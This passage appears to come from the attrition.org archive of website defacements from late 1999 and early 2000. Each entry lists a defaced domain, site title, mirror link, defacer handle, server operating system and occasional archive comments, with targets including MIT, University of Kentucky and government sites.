Defaced domain: www.axion-comp.com
Site Title: Axion Computing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.axion-comp.com
Defaced by: w0lf
Operating System: Irix

Defaced domain: www.businessweb.ru
Site Title: Business Web Russia
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.businessweb.ru
Defaced by: Z0omer
Operating System: Windows NT
Potentially offensive content on defaced page.
Defaced domain: www.bankerusa.com
Site Title: Banker of USA Mortgage
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.bankerusa.com
Defaced by: slash
Operating System: Windows NT
Previously defaced on 1999.04.23 99.12.27 99.12.23 by tonekore OHB THESAINT666

Defaced domain: seresc.k12.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/12/09/seresc.k12.nh.us
Defaced by: bansh33
Operating System: Linux (Apache 1.2.4)
Previously defaced on 99.11.14 by h4p
Potentially offensive content on defaced page.

Defaced domain: keyautomation.com
Site Title: Key Automation Services
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/keyautomation.com
Defaced by: w0lf
Operating System: Irix

Defaced domain: www.h-c-v.org
Site Title: HCV
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.h-c-v.org
Operating System: FreeBSD
Previously defaced on 99.12.22 by ezoons
Potentially offensive content on defaced page

Defaced domain: www.flanders-brilliant.be
Site Title: Flanders Diamond Exporters
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.flanders-brilliant.be
Defaced by: illusions team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.kta.on.ca
Site Title: Kaufman Thomas & Associates, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.kta.on.ca
Defaced by: BLN
Operating System: Windows NT (IIS/40)
Potentially offensive content on defaced page.

Defaced domain: www.chilefix.com
Site Title: Chilefix
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.chilefix.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.ordermed.com
Site Title: ordermed
Mirror: http://www.attrition.org/mirror/attrition/1999/12/28/www.ordermed.com
Defaced by: slash
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.24 by BLN
Potentially offensive content on defaced page.
Defaced domain: www.milliondollargroup.com
Site Title: World Wide Resources Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.milliondollargroup.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.skywalkersrelm.com
Site Title: Skywalker's Realm
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.skywalkersrelm.com
Defaced by: Cobra
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: isc2000.org.in
Site Title: Indian Science Congress
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/isc2000.org.in
Defaced by: mOs
Operating System: Red Hat Linux
Attrition comment: This site has allegedly been hacked by a Pakistani and
references the recent hijacking of an Indian Airlines plane in Afghanistan as
well as the Kashmir issue.

Defaced domain: www.chesstour.com
Site Title: Continental Chess Association
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.chesstour.com
Defaced by: mruno
Operating System: Irix (Rapidsite/Apa-1.3.4)
Potentially offensive content on defaced page.

Defaced domain: www.britine.com
Site Title: BriTine Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/27/www.britine.com
Defaced by: BLN
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.overseasdiamonds.com
Site Title: Over Seas Diamonds
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.overseasdiamonds.com
Defaced by: Illusions Team
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.aoc.com
Site Title: PRC Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.aoc.com
Defaced by: FiberOPS
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.virtualshack.com
Site Title: Virtual Shack
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.virtualshack.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.acia.com
Site Title: American Construction Inspectors Association
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.acia.com
Defaced by: _B0dd4H_
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.familycomputerworkshop.com
Site Title: Family Computer Workshop
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.familycomputerworkshop.com
Defaced by: OHB
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.mute300.net
Site Title: MUTE300
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.mute300.net
Defaced by: crx
Operating System: FreeBSD 2.2.1
Previously defaced on 99.11.17 99.12.24 by Sabu crack
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.teamchicksbeach.com
Site Title: W. Tyler Smith
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.teamchicksbeach.com
Defaced by: basnh33
Operating System: BSDI 3.0-3.1 (Apache 1.2.6)
Potentially offensive content on defaced page.

Defaced domain: www.foolproof.com
Site Title: FOOLPROOF
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.foolproof.com
Defaced by: www.foolproof.com
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.stattrack.com
Site Title: Chris Howard
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.stattrack.com
Defaced by: GiG4
Operating System: Red Hat Linux (Apache 1.3.3)
Potentially offensive content on defaced page.
Defaced domain: www.pickytricks.com
Site Title: Picky Tricks
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.pickytricks.com
Defaced by: bansh33
Operating System: Solaris 2.5x (ConcentricHost-Ashurbanipal/1.7)
Potentially offensive content on defaced page.

Defaced domain: www.magmatec.co.za
Mirror: http://www.attrition.org/mirror/attrition/1999/12/29/www.magmatec.co.za
Defaced by: aKt0r and DaJinX from the B10zCrew
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: frst1.frst.govt.nz
Site Title: frst.govt.nz
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/frst1.frst.govt.nz
Defaced by: Irony and Adoni
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.spot.com
Site Title: Spot Image Corp
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.spot.com
Defaced by: Adoni and Irony
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.gc.doe.gov
Site Title: U.S. Department of Energy
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.gc.doe.gov
Defaced by: Copag from OHB
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.11.18 (twice) by globerh, hv2k
Potentially offensive content on defaced page.

Defaced domain: santafe.poderjudicial-sfe.gov.ar
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/santafe.poderjudicial-sfe.gov.ar
Defaced by: Adoni and Irony
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.railtrack.co.uk
Site Title: Railtrack PLC
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.railtrack.co.uk
Defaced by: team spl0it
Operating System: Windows NT (Netscape-Enterprise/3.6)
Potentially offensive content on defaced page.
Defaced domain: www.zee.net.in
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.zee.net.in
Defaced by: m0s
Operating System: Red Hat Linux (Apache 1.3.3)
HIDDEN comments in the HTML.
Potentially offensive content on defaced page.

Defaced domain: www.itcnet-gr.com
Site Title: KKT-ITC S.A.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.itcnet-gr.com
Defaced by: w0lf
Operating System: Irix (Rapidsite/Apa-1.3.4)
Potentially offensive content on defaced page.

Defaced domain: www.britine.com
Site Title: BriTine Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/30/www.britine.com
Defaced by: Copag [OHB]
Operating System: Windows NT (IIS/4.0)
Previously defaced on 99.12.27 by BLN
Potentially offensive content on defaced page.

Defaced domain: www.dudley.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.dudley.gov.uk
Defaced by: team spl0it
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.fpsgaming.com
Site Title: Ugly Black Line Productions
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.fpsgaming.com
Defaced by: j0eb0b
Operating System: Red Hat Linux (Apache 1.3.6)
Potentially offensive content on defaced page.

Defaced domain: www.wbsnet.co.uk
Site Title: Wyvern Business Systems Ltd
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.wbsnet.co.uk
Defaced by: team spl0it
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.eshare.com
Site Title: eShare Technologies, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eshare.com
Defaced by: The Misanthropic Bitch
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: www.imagine.com
Site Title: Imagine.Com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.imagine.com
Defaced by: Oyster and Klam
Operating System: Solaris 2.6 - 2.7 (SWS 1.0)
Potentially offensive content on defaced page.

Defaced domain: www.success.edu
Site Title: Glendal Career College
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.success.edu
Defaced by: Oyster and Klam
Operating System: Solaris 2.3 - 2.4 (NCSA/SMI-1.0)
Potentially offensive content on defaced page.

Defaced domain: www.eidos.com
Site Title: EIDOS Corporation
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eidos.com
Defaced by: Oyster and Klam
Operating System: Solaris 2.5x (Netscape-Enterprise/2.0a)
Potentially offensive content on defaced page.

Defaced domain: www.eff.org
Site Title: Electronic Frontier Foundation
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.eff.org
Defaced by: OySTr n KLaM
Operating System: Solaris 2.5x (Stronghold/2.2 Apache/1.2.5 C2NetUS/2005)
Potentially offensive content on defaced page.

Defaced domain: www.codema.com
Site Title: Consulting Design Management
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.codema.com
Defaced by: w0lf
Operating System: Irix

Defaced domain: www.spdif.com
Site Title: Spdif.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.spdif.com
Defaced by: layer8
Operating System: Linux
Potentially offensive content on defaced page.

Defaced domain: www.agr.state.nc.us
Site Title: North Carolina State Department of Agriculture
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.agr.state.nc.us
Defaced by: hV2k
Operating System: Windows NT

Defaced domain: www.tsne.co.kr
Site Title: TaeSung Software & Engineering, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.tsne.co.kr
Defaced by: #phreak.nl
Operating System: Irix
Potentially offensive content on defaced page.
Defaced domain: www.mexicobusiness.com
Site Title: Mexico Business Magazine
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.mexicobusiness.com
Defaced by: supervillian
Operating System: FreeBSD

Defaced domain: www.mms.gov
Site Title: Minerals Management Service
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.mms.gov
Defaced by: hV2k
Operating System: Windows NT
Previously defaced on 99.10 28 99.20.29 by fuqrag

Defaced domain: www.familyoffriends.com
Site Title: Dorothy's Closet
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.familyoffriends.com
Defaced by: Ipxmen
Operating System: BSDI

Defaced domain: www.2id.com
Site Title: Imbault Interactif Diveloppement
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.2id.com
Defaced by: Loopback
Operating System: BSDI 3.x (Apache 1.2.6)
Potentially offensive content on defaced page.

Defaced domain: mtvasia.com
Site Title: MTV Asia
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/mtvasia.com
Defaced by: [1]
Operating System: Solaris
Previously defaced on 99.09.11 by Dizasta

Defaced domain: www.st-louis.net
Site Title: St. Louis Internet, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.st-louis.net
Defaced by: Uneek Tech
Operating System: Windows NT (Netscape-Enterprise/2.01)
Potentially offensive content on defaced page.

Defaced domain: www.fightcrime.org
Site Title: Fight Crime: Invest In Kids
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.fightcrime.org
Defaced by: sys-edit
Operating System: Windows NT
Potentially offensive content on defaced page.

Defaced domain: www.aoc.com
Site Title: PRC Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.aoc.com
Defaced by: Hardc0rps
Operating System: Windows NT

Defaced domain: www.m2europe.com
Site Title: MTVN Online L.P.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.m2europe.com
Operating System: Solaris 2.6 - 2.7 (Apache 1.3.9)
Potentially offensive content on defaced page.

Defaced domain: londonfirebrigade.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/londonfirebrigade.gov.uk
Defaced by: Hardc0rps crew
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: evo.sugef.fi.cr
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/evo.sugef.fi.cr
Defaced by: hardc0rps
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: www.lsrdesigns.com
Site Title: Lindsay Richman
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.lsrdesigns.com
Operating System: Digital Unix (Apache 1.3.9)
Potentially offensive content on defaced page.

Defaced domain: cxx.cx
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/cxx.cx
Defaced by: Hardc0rps crew
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: app.ytv.com
Site Title: YTV
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/app.ytv.com
Defaced by: IronY And Adoni
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: ecc3.ipswitch.com
Site Title: Ipswitch, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/ecc3.ipswitch.com
Defaced by: IronY and Adoni
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.

Defaced domain: ecommerce.ipswitch.com
Site Title: Ipswitch, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/ecommerce.ipswitch.com
Defaced by: IronY and Adoni
Operating System: Windows NT (IIS/4.0)
Potentially offensive content on defaced page.
Defaced domain: isc.gov.au Site Title: Insurance & Superannuation Commission Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/isc.gov.au Defaced by: IronY and Adoni Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ibe.co.jp Site Title: Ibe corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.ibe.co.jp Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.1.0) Potentially offensive content on defaced page. Defaced domain: www.mid-southern.com Site Title: Mid Southern Savings Bank Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.mid-southern.com Defaced by: hypnos Operating System: Linux (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.rotel.com.tr Site Title: Rotel ic ve dis tic a.s Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.rotel.com.tr Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.3.0) Potentially offensive content on defaced page. Defaced domain: www.bviy2k.vg Site Title: Government of the British Virgin Islands Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.bviy2k.vg Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.actualrealityinc.com Site Title: Movie Manufacturing Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.actualrealityinc.com Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.2.0) Potentially offensive content on defaced page. Defaced domain: www.linernotes.co.jp Site Title: Saigado Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.linernotes.co.jp Defaced by: acidklown Operating System: MacOS (AppleShareIP/6.1.0) Potentially offensive content on defaced page. 
Defaced domain: www.abevents.com Site Title: Alexandra Barnett Events Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.abevents.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.astrocats.com Site Title: AstroCats Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.astrocats.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95/2.0) Potentially offensive content on defaced page. Defaced domain: www.akte.com.sa Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.akte.com.sa Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.blanchettefamily.com Site Title: Paul Blanchette Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.blanchettefamily.com Defaced by: acidklown Operating System: Windows 95 (Microsoft-PWS-95) Potentially offensive content on defaced page. Defaced domain: www.bhv.hn Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.bhv.hn Defaced by: acidklown Operating System: Windows NT (IIS/4.0) Previously defaced on (4 different days) by Potentially offensive content on defaced page. Defaced domain: primario.cesae.pt Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/primario.cesae.pt Defaced by: IronY and Adoni Operating System: NT Defaced domain: ar.ru Site Title: Stanford Trident international Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/ar.ru Defaced by: IronY and Adoni Operating System: NT Defaced domain: amg.ar.ru Site Title: Stanford Trident international Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/amg.ar.ru Defaced by: IronY and Adoni Operating System: NT Defaced domain: TOUROU.edu Site Title: Touro University International Inc. 
Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/TOUROU.edu Defaced by: IronY and Adoni Operating System: NT Potentially offensive content on defaced page. Defaced domain: misi.minolta.com Site Title: Minolta Information Systems Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/misi.minolta.com Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.usembassy-china.org.cn Site Title: Embassy of the United States of America in China Mirror: http://www.attrition.org/mirror/attrition/2000/01/01/www.usembassy-china.org.cn Defaced by: floppynuts and captain pen0r Operating System: Solaris Previously defaced on 99.09.11 99.05.10 by Hi-Tech Hate Defaced domain: www.mysticvalleyrealty.com Site Title: Mystic Valley Real Estate, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.mysticvalleyrealty.com Defaced by: Algorithm Cracker Operating System: Windows NT HIDDEN comments in the HTML. Defaced domain: www.pandaman.com Site Title: Panda Man Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.pandaman.com Defaced by: freax Operating System: Windows NT Defaced domain: www.csbsys.com Site Title: CSB Systems Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.csbsys.com Defaced by: Algorithm Cracker Operating System: SCO Unix Defaced domain: www.lloydsoflondon.co.uk Site Title: Lloyds of London Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.lloydsoflondon.co.uk Defaced by: X Operating System: Windows NT Defaced domain: www.swcs.org Site Title: Soil and Water Conservation Society Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.swcs.org Defaced by: Team Echo Operating System: Windows NT Potentially offensive content on defaced page. 
Defaced domain: www.aoc.com Site Title: PRC Inc Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.aoc.com Defaced by: traceroute Operating System: Windows NT Attrition comment: This site was previously defaced on 99.12.30 and 99.12.31 by FiberOPS and Hardc0rps Defaced domain: www.nlc.org Site Title: National League of Cities Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.nlc.org Defaced by: unknown Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.micros0ft.co.uk Site Title: F Communications Limited Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.micros0ft.co.uk Defaced by: arkitekt Operating System: Linux Defaced domain: www.nightfalls.com Site Title: Night Falls Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.nightfalls.com Defaced by: bansh33 Operating System: Linux Defaced domain: www.e-business.com.my Site Title: E-Business Malaysia Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.e-business.com.my Defaced by: Sewerage shit Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.lexstar.com Site Title: Lexstar, Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.lexstar.com Defaced by: w0lf Operating System: Irix Potentially offensive content on defaced page. 
Defaced domain: www.worcester.edu Site Title: Worcester State College Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.worcester.edu Defaced by: blairox Operating System: Windows NT Defaced domain: www.gddc.pt Site Title: Gabinete de Documentação e Direito Comparado (GDDC) Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.gddc.pt Defaced by: ph33r th3 b33r Operating System: Windows NT Previously defaced on 99.12.23 by Shandar Defaced domain: ns1.secure.net.uk Site Title: SecureNet UK Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ns1.secure.net.uk Defaced by: Irony and Adoni Operating System: Windows NT Defaced domain: vipor1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vipor1.uky.edu Defaced by: Irony Operating System: Windows NT Defaced domain: vipor2.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vipor2.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: syquery.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/syquery.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: prxy1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/prxy1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: ghi.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ghi.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. 
Defaced domain: vip1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/vip1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: hrdbdev1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/hrdbdev1.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.gn1.net Site Title: GLINN Publishing Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.gn1.net Defaced by: hV2k Operating System: Windows NT Potentially offensive content on defaced page. Attrition comment: Reportedly an ISP for X-Rated Web sites Defaced domain: service9.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/service9.uky.edu Defaced by: IronY Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.wwasp.com Site Title: Worldwide Association of Specialty Programs Mirror: http://www.attrition.org/mirror/attrition/1999/12/31/www.wwasp.com Defaced by: unknown Operating System: Windows NT Potentially offensive content on defaced page. Attrition comment: The link on the defaced page points to an apparent clearing house of articles about WWASP that shows it to be a shadowy organization. Several allegations of child abuse have been made according to these articles Defaced domain: www.cardiff.gov.uk Site Title: Cardiff Government Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.cardiff.gov.uk Defaced by: SuperSheep Operating System: Windows NT Defaced domain: huk.8k.com Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/huk.8k.com Defaced by: TecH & Cynical Operating System: Linux Defaced domain: www.immigration-canada.com Site Title: Colin R. Singer & Associates Inc. 
Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.immigration-canada.com Defaced by: Dead-Socket Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.njreporter.org Site Title: The New Jersey Reporter Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/www.njreporter.org Defaced by: Dead-Socket Operating System: Linux Potentially offensive content on defaced page. Defaced domain: ericsson.com.tw Site Title: Ericsson Taiwan Ltd. Mirror: http://www.attrition.org/mirror/attrition/2000/01/02/ericsson.com.tw Defaced by: inferno.br Operating System: NT Defaced domain: www.abevents.com Site Title: Alexandra Barnett Events Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/www.abevents.com Defaced by: Neutron Operating System: Win 95 Defaced domain: www.emerge-technologies.com Site Title: Emerge Technologies, LLC. Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/www.emerge-technologies.com Defaced by: Niel and Bob Potentially offensive content on defaced page. Defaced domain: mail.allianttech.com Site Title: Alliant Technologies Inc. Mirror: http://www.attrition.org/mirror/attrition/2000/01/03/mail.allianttech.com Defaced by: The Keebler Elfs Operating System: NT Defaced domain: www.gn1.com Site Title: GLINN Publishing Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.gn1.com Defaced by: hV2k Operating System: Windows NT Potentially offensive content on defaced page. 
Defaced domain: prxy1.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/prxy1.uky.edu Defaced by: Ossama Bin Laden hackers Operating System: Windows NT Attrition comment: Mass hack by OBL hackers Defaced domain: www.cmmr.com.cn Site Title: Beijing Mainland Marketing Research Co Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.cmmr.com.cn Defaced by: Inferno.br Operating System: Windows NT Previously defaced on 99.10.18 by unknown Defaced domain: www.phreak2000.com Site Title: Phreak2000 Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.phreak2000.com Defaced by: y2k Crew Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.bluehat.com Site Title: BlueHat Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.bluehat.com Defaced by: Klept0 Operating System: Red Hat Linux Defaced domain: www.virtualshack.com Site Title: Professional Hackers Clan Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.virtualshack.com Defaced by: Virtual Shack ^^^ Operating System: Windows NT Previously defaced on 99.12.22 99.12.27 99.12.30 by BLN OHB Potentially offensive content on defaced page. 
Defaced domain: www.sd02.k12.id.us Site Title: Meridian joint school district Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.sd02.k12.id.us Defaced by: hV2k Operating System: Windows NT Defaced domain: syquery.uky.edu Site Title: University of Kentucky Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/syquery.uky.edu Defaced by: ussama bin laden hackers Operating System: NT Defaced domain: backup-www.rnet.ucla.edu Site Title: UCLA RNet backup server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/backup-www.rnet.ucla.edu Defaced by: IronY and Dec0 Operating System: Windows NT Defaced domain: www.microsoft.com.tw Site Title: Microsoft Taiwan Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.microsoft.com.tw Defaced by: Inferno.br Operating System: NT Defaced domain: development.rnet.ucla.edu Site Title: UCLA RNet development server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/development.rnet.ucla.edu Defaced by: IronY and Dec0 Operating System: Windows NT Defaced domain: techware.mit.edu Site Title: MIT TechWare Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/techware.mit.edu Defaced by: Dec0 Operating System: Windows NT Attrition comment: This is the FIRST reported defacement of an MIT Web server Defaced domain: udc.mit.edu Site Title: MIT UDC Server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/udc.mit.edu Defaced by: comdak Operating System: Windows NT Potentially offensive content on defaced page. 
Defaced domain: tpc.mit.edu Site Title: MIT TPC server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/tpc.mit.edu Defaced by: comtrak Operating System: Windows NT Defaced domain: selway.nic.edu Site Title: North Idaho College Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/selway.nic.edu Defaced by: IronY Operating System: Windows NT Defaced domain: ceto.mit.edu Site Title: MIT Ceto server Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/ceto.mit.edu Defaced by: comtak Operating System: Windows NT Defaced domain: lean2.mit.edu Site Title: Massachusetts Institute of Technology Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/lean2.mit.edu Defaced by: Algorithm Cracker Operating System: 95 HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.bmc.umich.edu Site Title: University of Michigan -- ITD Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.bmc.umich.edu Defaced by: herf Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.dunnavan.com Site Title: C.C. Dunnavan & Co. Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/www.dunnavan.com Defaced by: Tron Operating System: NT Defaced domain: radiologycme.stanford.edu Site Title: Stanford University Mirror: http://www.attrition.org/mirror/attrition/2000/01/04/radiologycme.stanford.edu Defaced by: Algorithm Cracker Operating System: NT HIDDEN comments in the HTML. Defaced domain: www.goldsys.org Site Title: Goldsys Technology Corp. 
